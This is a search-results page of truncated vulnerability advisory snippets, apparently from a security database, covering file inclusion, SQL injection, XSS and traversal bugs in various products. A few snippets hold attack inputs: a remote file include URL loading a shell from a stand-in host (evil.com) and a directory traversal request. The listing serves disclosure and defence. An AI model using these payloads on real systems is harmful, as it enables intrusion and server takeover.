Lucene search
Securityvulns: Most viewed

47153 matches found

securityvulns
added 2008/06/09 12:0 a.m., 130 views

Akamai Technologies Security Advisory 2008-0003 (Akamai Client Software)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------- Akamai Technologies Security Advisory 2008-0003 Akamai ID: 2008-0003 Date: 2008/06/06 Product Name: Akamai Client Software formerly Red Swoosh Affected Versions: Up to and including 3322 Fixed...

CVSS 7.1, AI score 0.2, EPSS 0.00773
Exploits: 1

securityvulns
added 2007/11/25 12:0 a.m., 130 views

Mp3 ToolBox 1.0 beta 5 Remote File Include Vulnerability

+By CrackersChild+ Script.......: Mp3 ToolBox 1.0 beta 5 Download.....: http://www.radiotoolbox.com/downloads/mp3toolbox/mp3toolboxbeta-5.zip Author.......: CrackersChild | [email protected] & [email protected] Class........: Remote File Include Vulnerability Dork.........: intitle:M...

AI score 1.4
Exploits: 0

securityvulns
added 2007/04/12 12:0 a.m., 130 views

cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability

cattaDoc 2.21download2.php fn1Remote File Disclosure Vulnerability D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group V.Code: $tp = $REQUEST'mtp'; $ofn =...

AI score 0.4
Exploits: 0

securityvulns
added 2007/01/25 12:0 a.m., 130 views

EzDatabase Multiple Cross-Site Scripting Vulnerability

EzDatabase Multiple Cross-Site Scripting Vulnerability Written in PHP and MySQL, ezDatabase is the foundation for your online databases. It is a powerful web based application that allows users with basic HTML knowledge to create online databases for their website. ezDatabase will do the hard wor...

AI score 0.6
Exploits: 0

securityvulns
added 2006/07/24 12:0 a.m., 130 views

MiniBB Forum <= 1.5a Remote File Include Vulnerabilities

--------------------------------------------------------------------------------- MiniBB Forum = 1.5a Remote File Include Vulnerabilities --------------------------------------------------------------------------------- Author : Matdhule Contact : [email protected] Application : MiniBB Forum...

AI score 2.1
Exploits: 0

securityvulns
added 2006/07/08 12:0 a.m., 130 views

Sparklet game format string vulnerability

Format string vulnerability on player name displaying...

AI score 2.2
Exploits: 0, References: 1, Affected Software: 1

securityvulns
added 2003/10/10 12:0 a.m., 130 views

Buffer overflow when processing the macro structure

Affected products: Microsoft Word 97, Microsoft Word 2000 SR-1. In Microsoft Word XP this bug is fixed. When processing a Microsoft Word document that contains macros, a stack buffer overflow can occur. Parsing of the undocumented macro structure in the document, performed by the process...

AI score 0.6
Exploits: 0

securityvulns
added 2000/11/24 12:0 a.m., 130 views

RESIN ServletExec JSP Source Disclosure Vulnerability(IIS 5)

Resintm serves the fastest servlets and JSP. With Java and JavaScript support, Resin gives web applications the flexibility to choose the right language for the task. Resin's leading XSL XML stylesheet language support encourages separation of content from formatting. Resin provides a fast servle...

AI score 6.7
Exploits: 0

securityvulns
added 2000/06/28 12:0 a.m., 130 views

Concerning the LDAP Enabled Netscape FTP Server

Over the last few days a great number of people have mailed us in regards to the "Netscape Professional Services FTP Server Vulnerability" http://www.securityfocus.com/bid/1375 discovered by Michal Zalewski [email protected] and posted to the Bugtraq mailing list on Wed, 21 Jun 2000. The following...

AI score 7.1
Exploits: 0

securityvulns
added 2000/04/20 12:0 a.m., 130 views

Cisco Catalyst allows any user to obtain administrator privileges.

In software version 5.41 the enable password check can be bypassed. Fixed in 5.42...

AI score 0.7
Exploits: 0, References: 1, Affected Software: 1

securityvulns
added 2015/03/21 12:0 a.m., 129 views

Security Audit Notes: OpenSSL d1_srvr.c Overflow - Advanced Information Security

-= Advanced Information Security Corporation =- ------------------------------------------------------------------------ Author: Nicholas Lemonias Type: Security Audit Notes Date: 17/3/2015 Email: lem.nikolas at gmail dot com Audit: OpenSSL v1.0.2 22nd of January, 2015 Release...

AI score 7.2
Exploits: 0

securityvulns
added 2014/09/15 12:0 a.m., 129 views

[SECURITY] CVE-2013-4444 Remote Code Execution in Apache Tomcat

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2013-4444 Remote Code Execution Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Apache Tomcat 7.0.0 to 7.0.39 Description: In very limited circumstances, it was possible for an attacker to upload a malicious JSP t...

CVSS 6.8, AI score 8.8, EPSS 0.1399
Exploits: 0

securityvulns
added 2013/12/09 12:0 a.m., 129 views

Remote Code Execution in Microweber

Advisory ID: HTB23175 Product: Microweber Vendor: Microweber Vulnerable Versions: 0.8 and probably prior Tested Version: 0.8 Advisory Publication: September 25, 2013 without technical details Vendor Notification: September 25, 2013 Vendor Patch: September 26, 2013 Public Disclosure: October 16,...

CVSS 6.4, AI score 0.3, EPSS 0.02823
Exploits: 2

securityvulns
added 2013/12/09 12:0 a.m., 129 views

Cross-Site Scripting (XSS) in Zikula Application Framework

Advisory ID: HTB23178 Product: Zikula Application Framework Vendor: Zikula Software Foundation Vulnerable Versions: 1.3.5 build 20 and probably prior Tested Version: 1.3.5 build 20 Advisory Publication: October 16, 2013 without technical details Vendor Notification: October 16, 2013 Vendor Patch:...

CVSS 4.3, AI score 6.3, EPSS 0.0122
Exploits: 3

securityvulns
added 2012/11/02 12:0 a.m., 129 views

PG Dating Pro v1.0 CMS - Multiple Web Vulnerabilities

Title: ====== PG Dating Pro v1.0 CMS - Multiple Web Vulnerabilities Date: ===== 2012-10-29 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=736 VL-ID: ===== 736 Common Vulnerability Scoring System: ==================================== 8.5 Introduction: =============...

AI score 8.7
Exploits: 0

securityvulns
added 2012/10/30 12:0 a.m., 129 views

[security bulletin] HPSBUX02825 SSRT100974 rev.1 - HP-UX Running Java, Remote Indirect Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03538957 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03538957 Version: 1 HPSBUX02825...

AI score 0.5, EPSS 0.12471
Exploits: 1

securityvulns
added 2012/08/13 12:0 a.m., 129 views

[CVE-2012-3873] Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities

Title: Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities Affected Software: http://www.openconstructor.org/ http://code.google.com/p/openconstructor/downloads/list http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234 Description: Openconstructor...

CVSS 6.5, AI score 0.4, EPSS 0.0092
Exploits: 6

securityvulns
added 2012/07/23 12:0 a.m., 129 views

Jrobalian CMS SQL Injection Vulnerability

===================================================== Jrobalian CMS SQL Injection Vulnerability ===================================================== :----------------------------------------------------------------------------------------------------------------------------------------: :...

AI score 8.3
Exploits: 0

securityvulns
added 2012/02/16 12:0 a.m., 129 views

http://www.adobe.com/support/security/bulletins/apsb12-03.html

Security update available for Adobe Flash Player Release date: February 15, 2012 Vulnerability identifier: APSB12-03 CVE number: CVE-2012-0751, CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756, CVE-2012-0767 Platform: All Platforms SUMMARY This update addresses critical...

CVSS 10, AI score 1.1, EPSS 0.9203
Exploits: 13

securityvulns
added 2011/10/15 12:0 a.m., 129 views

APPLE-SA-2011-10-12-4 Safari 5.1.1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-10-12-4 Safari 5.1.1 Safari 5.1.1 is now available and addresses the following: Safari Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.2, OS X Lion Server v10.7.2, Windows 7, Vista, XP SP2 or later Impact:...

CVSS 9.3, AI score 9.6, EPSS 0.50213
Exploits: 15

securityvulns
added 2011/08/10 12:0 a.m., 129 views

[security bulletin] HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02942411 Version: 1 HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access NOTICE: The information in this Security Bulletin should be acted up...

CVSS 6.4, AI score 0.8, EPSS 0.02519
Exploits: 0

securityvulns
added 2011/06/10 12:0 a.m., 129 views

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems now Oracle. It is the...

AI score 0.3
Exploits: 0

securityvulns
added 2011/06/10 12:0 a.m., 129 views

ZDI-11-189: Oracle Java ICC Profile ncl2 DevCoords Tag Parsing Remote Code Execution Vulnerability

ZDI-11-189: Oracle Java ICC Profile ncl2 DevCoords Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-189 June 8, 2011 -- CVE ID: CVE-2011-0862 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java...

CVSS 10, AI score 0.7, EPSS 0.06277
Exploits: 0

securityvulns
added 2011/05/08 12:0 a.m., 129 views

HTB22970: Multiple XSS vulnerabilities in PHPDug

Vulnerability ID: HTB22970 Reference: http://www.htbridge.ch/advisory/multiplexssvulnerabilitiesinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability Type: XSS Cross Site...

Exploits: 0

securityvulns
added 2011/04/11 12:0 a.m., 129 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS 7.8, AI score 1.6, EPSS 0.38775
Exploits: 0, References: 17, Affected Software: 5

securityvulns
added 2010/12/14 12:0 a.m., 129 views

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD bug discovered & exploited by Kingcope Dec 2010 Lame Xploit Tested with success on FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86...

AI score 7.3
Exploits: 0

securityvulns
added 2010/12/12 12:0 a.m., 129 views

www.eVuln.com : Non-persistent XSS in slickMsg

www.eVuln.com advisory: Non-persistent XSS in slickMsg Summary: http://evuln.com/vulns/159/summary.html Details: http://evuln.com/vulns/159/description.html -----------Summary----------- eVuln ID: EV0159 Software: slickMsg Version: 0.7-alpha Critical Level: low Type: Cross Site Scripting Status:...

AI score 0.1
Exploits: 0

securityvulns
added 2010/10/28 12:0 a.m., 129 views

LFI in DZCP

Vulnerability ID: HTB22656 Reference: http://www.htbridge.ch/advisory/lfiindzcp.html Product: DZCP Vendor: dzcp.de http://www.dzcp.de Vulnerable Version: 1.5.4 Vendor Notification: 13 October 2010 Vulnerability Type: Local File Inclusion Status: Fixed by Vendor Risk level: High Credit: High-Tech...

AI score 6.5
Exploits: 0

securityvulns
added 2010/06/25 12:0 a.m., 129 views

Mozilla Foundation Security Advisory 2010-28

Mozilla Foundation Security Advisory 2010-28 Title: Freed object reuse across plugin instances Impact: Critical Announced: June 22, 2010 Reporter: Microsoft Vulnerability Research Products: Firefox, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 SeaMonkey 2.0.5 Description Microsoft Vulnerabili...

CVSS 9.3, AI score 0.4, EPSS 0.04812
Exploits: 0

securityvulns
added 2010/01/21 12:0 a.m., 129 views

eWebeditor Directory Traversal Vulnerability

Securitylab.ir Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./.. Discovered By: Pouya Daneshmand Website: http://securitylab.ir Contacts:...

AI score 0.7
Exploits: 0

securityvulns
added 2009/11/17 12:0 a.m., 129 views

Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html =============Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation================ Authors: Giuseppe 'Evilcry' Bonfa' AbdulAziz Hariri E-Mail: evilcry AT GMAIL DOT COM Website: http://evilcry.netsons.org...

AI score 0.6
Exploits: 0

securityvulns
added 2009/11/11 12:0 a.m., 129 views

[MORNINGSTAR-2009-02] Multiple security issues in Cute News and UTF-8 Cute News

MorningStar Security - Advisory http://www.morningstarsecurity.com/ Multiple security issues in Cute News and UTF-8 Cute News 1. Advisory Information ------------------------------------------------------------------------------------------------------------------------ Title: Multiple security...

AI score 7
Exploits: 0

securityvulns
added 2009/04/17 12:0 a.m., 129 views

Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit

?php / Geeklog = 1.5.2 savepreferences/blocks remote sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ PHP and MySQL version independent vulnerability, see usersettings.php near lines 1467 - 1480: ... if isset...

AI score 7.6
Exploits: 0

securityvulns
added 2009/04/10 12:0 a.m., 129 views

Adgregate ShopAd widget validation is vulnerable to replay attack

Adgregate is a "TechCrunch 50" startup that recently signed a distribution deal with Google/DoubleClick 1. As a service, they offer a "viral widget" intended to be hosted on untrusted third-party sites through which consumers can enter their credit card information. According to their website, th...

AI score 1
Exploits: 0

securityvulns
added 2009/01/15 12:0 a.m., 129 views

US-CERT Technical Cyber Security Alert TA09-015A -- Oracle Updates for Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA09-015A Oracle Updates for Multiple Vulnerabilities Original release date: January 15, 2009 Last revised: -- Source: US-CERT Systems Affected Oracle Database 11g, version 11.1.0.6 Oracle...

AI score 0.9
Exploits: 0

securityvulns
added 2008/12/15 12:0 a.m., 129 views

Multiple XSS Vulnerabilities in World Recipe 2.11

Armorize Technologies Security Advisory Armorize-ADV-2008-0001 Title: Multiple XSS Vulnerabilities in World Recipe 2.11 Date: 2008/12/15 Status: Full Class: Input Validation Error Bugtraq ID: N/A Category: Cross Site Scripting Language: ASP.NET C Description Armorize-ADV-2008-0001 discloses...

AI score 0.3
Exploits: 0

securityvulns
added 2008/10/03 12:0 a.m., 129 views

[USN-649-1] OpenSSH vulnerabilities

=========================================================== Ubuntu Security Notice USN-649-1 October 01, 2008 openssh vulnerabilities CVE-2008-1657, CVE-2008-4109 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS...

CVSS 6.5, AI score 0.2, EPSS 0.28601
Exploits: 9

securityvulns
added 2008/08/01 12:0 a.m., 129 views

Atmail Remote Authentication Bypass, Full DB Compromise

@Mail PHP Version 5.41 patch Release http://atmail.com/demo/atmailphpdemo.tgz The default install of Atmail 5.41 creates the following file in the atmail/ directory: build-plesk-upgrade.php If that file is called via http, such as: http://example.com/atmail/build-plesk-upgrade.php it will execute...

AI score 7
Exploits: 0

securityvulns
added 2008/05/22 12:0 a.m., 129 views

ZDI-08-029: Trillian AIM.DLL Long HTML Font Parameter Stack Overflow Vulnerability

ZDI-08-029: Trillian AIM.DLL Long HTML Font Parameter Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-029 May 21, 2008 -- Affected Vendors: Cerulean Studios -- Affected Products: Cerulean Studios Trillian -- TippingPointTM IPS Customer Protection: TippingPoint IPS...

AI score 0.9
Exploits: 0

securityvulns
added 2008/05/20 12:0 a.m., 129 views

Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability

========================================================== Starsgames Control Panel = 4.6.2 Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 19 May 2008 SITE : www.citec.us APPLICATION : Starsgames Control Panel VERSION : = 4.6.2...

AI score 0.8
Exploits: 0

securityvulns
added 2008/04/27 12:0 a.m., 129 views

Wordpress 2.5 Cookie Integrity Protection Vulnerability

Wordpress 2.5 Cookie Integrity Protection Vulnerability Original release date: 2008-04-25 Last revised: 2008-04-25 Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-integrity.txt CVE ID: CVE-2008-1930 Source: Steven J. Murdoch http://www.cl.cam.ac.uk/users/sjm217/...

CVSS 7.5, AI score 0.8, EPSS 0.05001
Exploits: 3

securityvulns
added 2007/12/24 12:0 a.m., 129 views

[CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability

Title: CAID 35970: CA Products That Embed Ingres Authentication Vulnerability CA Vuln ID CAID: 35970 CA Advisory Date: 2007-12-19 Reported By: Ingres Corporation Impact: Attacker can gain elevated privileges. Summary: A potential vulnerability exists in the Ingres software that is embedded in...

CVSS 5, AI score 6, EPSS 0.01814
Exploits: 1

securityvulns
added 2007/12/07 12:0 a.m., 129 views

[security bulletin] HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01188923 Version: 1 HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager OV NNM Remote Unauthorized Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should...

CVSS 10, AI score 0.7, EPSS 0.69613
Exploits: 9

securityvulns
added 2007/04/11 12:0 a.m., 129 views

[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

comzoom2 Mambo Module Remote File Include Vulnerability autor:0ozeuso0 website:www.diosdelared.com mail:[email protected] 10/04/07 /components/comzoom2/classes/iptc/EXIFMakernote.php?mosConfigabsolutepath=http:/evil.com/shell.gif?...

AI score 0.6
Exploits: 0

securityvulns
added 2006/11/28 12:0 a.m., 129 views

tar archiver directory traversal

A problem with parsing of the outdated GNUTYPENAMES structure allows creating symbolic links outside the target directory...

AI score 3.9
Exploits: 0, References: 1, Affected Software: 1

securityvulns
added 2006/11/11 12:0 a.m., 129 views

Avahi privilege escalation

Insufficient validation of Netlink parameters allows manipulation of server parameters...

AI score 5.1
Exploits: 0, References: 1, Affected Software: 1

securityvulns
added 2006/11/09 12:0 a.m., 129 views

LetterIt v2 (inc/session.php) Remote File Include Vulnerability

================================================================================== LetterIt RFI ================================================================================== Info:- Scripts: LetterIt download : http://otterware.net/index.php?dl=45 Version : 2 Dork & vuln : download scripts an...

AI score 0.7
Exploits: 0

securityvulns
added 2006/10/13 12:0 a.m., 129 views

ExtCalThai_Component <= 0.9.1 Remote File Inclusion

ExtCalThaiComponent = 0.9.1 Remote File Inclusion Download Source : http://mamboxchange.com/frs/download.php/6004/ExtCalThaiComponentv0.9.1.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; adminevents.php extcalendar.p mail.inc.phphp bugs ; at -...

AI score 0.8
Exploits: 0

securityvulns
added 2006/10/11 12:0 a.m., 129 views

7 php scripts File Inclusion / Source disclosure Vuln

Title..: 7 php scripts File Inclusion Vuln / Source disclosure Credits: DarkFig Og.link: http://acid-root.new.fr/poc/13061007.txt Using http://www.google.com/codesearch Few examples about what we can do with a code search engine For educational purpose only. You can use regex in your research, th...

AI score 7.2
Exploits: 0

securityvulns
added 2006/09/14 12:0 a.m., 129 views

[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities

====================================================================== Secunia Research 14/09/2006 - Tagger LE PHP "eval" Injection Vulnerabilities - ====================================================================== Table of Contents Affected...

CVSS 7.5, AI score 0.6, EPSS 0.08205
Exploits: 1

Total number of security vulnerabilities: 5000